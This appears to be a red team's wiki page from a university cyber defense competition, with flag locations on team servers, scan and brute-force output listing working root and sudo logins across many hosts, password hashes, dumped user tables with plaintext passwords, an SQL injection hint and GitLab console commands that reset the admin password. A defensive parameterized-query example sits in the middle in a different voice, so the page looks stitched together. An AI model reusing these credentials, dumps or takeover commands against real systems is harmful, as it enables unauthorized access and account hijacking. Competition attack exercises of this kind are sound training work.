Red Wiki

Thanks for attending the CDC!
Competition Information
Flag Locations

phpBB Forum

BLUE FLAG

1) Dev Talk Forum
2) If Windows: C:\
   If Linux/Unix: /etc/

RED FLAG (Announcements forum/thread)

1) Announcements forum/thread
2) If Windows: C:\Windows\System32\
   If Linux/Unix: /root/


Game Box

BLUE FLAG

1) C:\Users\admin

RED FLAG

1) C:\Windows\System32\


Git Server

BLUE FLAG

1) /etc/

RED FLAG

1) /root
2) Set a "Broadcast Message" in Gitlab


Billing/DRM

BLUE FLAG

1) /etc/

RED FLAG

1) /root/
2) Extra line in: /var/www/isedrm/credit_cards.txt


Team Wiki Pages

Team 1:    None

Team 2:    None

Team 3:    None

Team 5:    None

Team 7:    None

Team 8:    None

Team 9:    None

Team 10:    None

Team 11:    None

Team 12:    None

Team 13:    None

Team 14:    None

Team 15:    None

Team 16:    None

Team 17:    None

Team 18:    None

Team 20:    None

Team 21:    None

Team 22:    None

Team 23:    None

Team 24:    None

Team 25:    None

Team 26:    None

Team 27:    None

Team 28:    None

Team 29:    None

Team 30:    None

Team 31:    None

Team 32:    None

Team 40:    ISEAGE

General Help and Information

Video of console MSF exploit: https://www.youtube.com/watch?v=n_79Ni8l0mc


Schedule

Time    Event
1100    Fire drill
1300    Begin Red evaluations
1400    Attack phase ends
1430    Red Team Debrief
1500    Begin awards ceremony
1600    Ceremony over, head home

Billing Box

"SELECT * from users where Username='" + username + "' and Password='" + password + "'"

Likely vulnerable to SQLi: use a ' as the password and you'll get the error.
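
The concatenated query above next to a parameterized version, as an added example that is not the billing app's own code. It assumes an in-memory SQLite table with constructed sample data; the function names are hypothetical.

```python
import sqlite3


def make_db():
    # Constructed sample table using the column names from the page's query and dumps.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (Username TEXT, Password TEXT, "
        "highscore INTEGER, purchased TEXT)"
    )
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-pass', 0, 'True')")
    return db


def login_concat(db, username, password):
    """The page's query, built by string concatenation (the vulnerable form)."""
    query = ("SELECT * from users where Username='" + username +
             "' and Password='" + password + "'")
    try:
        return "ok" if db.execute(query).fetchone() else "denied"
    except sqlite3.Error as exc:
        # The input changed the statement's syntax, so the database rejects it.
        # A SQL error triggered by a lone quote is the symptom noted above.
        return "sql-error: " + str(exc)


def login_param(db, username, password):
    """Same lookup with bound parameters: input is passed as data, never as SQL text."""
    query = "SELECT * FROM users WHERE Username = ? AND Password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return "ok" if row else "denied"


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "alice", "'"))               # statement breaks
    print(login_param(db, "alice", "'"))                # treated as a wrong password
    print(login_param(db, "alice", "constructed-pass")) # normal login still works
```

With bound parameters the lone quote is just a wrong password, so the login is denied without a database error. Password storage is a separate issue this example does not address.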

Generic vulnerabilities

root python shell at /console on billing app
Affected teams:




[+] 168.84.5.30:5900      - 168.84.5.30:5900 - Login Successful: :cdc

[*] Login found on billing.team1.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team1.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team1.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on forum.team10.isucdc.com -> cdc:cdc
[*] Login found on billing.team12.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team16.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team19.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team30.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!

[+] 1/git.team1.isucdc.com:22/Git SSH: root:cdc
[+] 1/billing.team1.isucdc.com:22/Billing SSH: cdc:cdc
[+] 2/git.team2.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 2/billing.team2.isucdc.com:22/Billing SSH: cdc:cdc
[+] 8/git.team8.isucdc.com:22/Git: cdc:cdc
[+] 9/git.team9.isucdc.com:22/Git SSH: cdc:cdc
[+] 9/billing.team9.isucdc.com:22/Billing SSH: cdc:cdc
[+] 10/git.team10.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 10/forum.team10.isucdc.com:22/Forum Remote Admin: cdc:cdc
[+] 11/git.team11.isucdc.com:22/Git SSH: cdc:cdc
[+] 12/git.team12.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 12/billing.team12.isucdc.com:22/Billing SSH: root:cdc,cdc:cdc
[+] 16/git.team16.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 19/git.team19.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 19/billing.team19.isucdc.com:22/Billing SSH: root:cdc,cdc:cdc
[+] 21/git.team21.isucdc.com:22/Git SSH: cdc:cdc
[+] 23/git.team23.isucdc.com:22/Git SSH: cdc:cdc
[+] 23/billing.team23.isucdc.com:22/Billing SSH: cdc:cdc
[+] 26/git.team26.isucdc.com:22/Git SSH: cdc:cdc
[+] 30/billing.team30.isucdc.com:22/Billing SSH: cdc:cdc
[+] 32/git.team32.isucdc.com:22/Git SSH: cdc:cdc

team30 hashes

usernames not found in the thingy above ^ (found on team 9's boxes with no passwords)
aray
pkelly
kboyd
gbaker
lbriggs:$1$uFhncasO$m2UIZlmXmsDDFLMkoaTDz0:1011:1012:Levi Briggs:/home/lbriggs:/bin/bash
cdouglas:$1$LKu/rsm5$pkBDvLWsoLK3mk3WTiO.o.:1012:1013:Clara Douglas:/home/cdouglas:/bin/bash


git.team32, billing.team30, git.team26 - Root Private key:


*anonymous FTP on forum servers (at least team 9)

Team 8 billing users:
select * from users;
+----------+-------------+-----------+-----------+
| username | password    | highscore | purchased |
+----------+-------------+-----------+-----------+
| cdc      | cdc         |        30 | True      |
| pkelly   | obsidian12  |         0 | True      |
| kboyd    | saxophone88 |         0 | True      |
| gbaker   | Hzfgqaq1    |         0 | True      |
+----------+-------------+-----------+-----------+

Team 15 billing users:
select * from users;
+----------+------------+-----------+-----------+
| username | password   | highscore | purchased |
+----------+------------+-----------+-----------+
| cdc      | cdc        |        30 | True      |
| kfrancis | zih20kan   |         0 | True      |
| pkelly   | obsidian12 |         0 | 1         |
+----------+------------+-----------+-----------+


As root on gitlab:

gitlab-rails console production

***Wait for console***

user = User.find(1)
user.password = 'cdc_red_team'
user.password_confirmation = 'cdc_red_team'
user.unlock_access!
user.save

BroadcastMessage.create!(message: '', starts_at: Time.now, ends_at: Time.now + 5.minutes)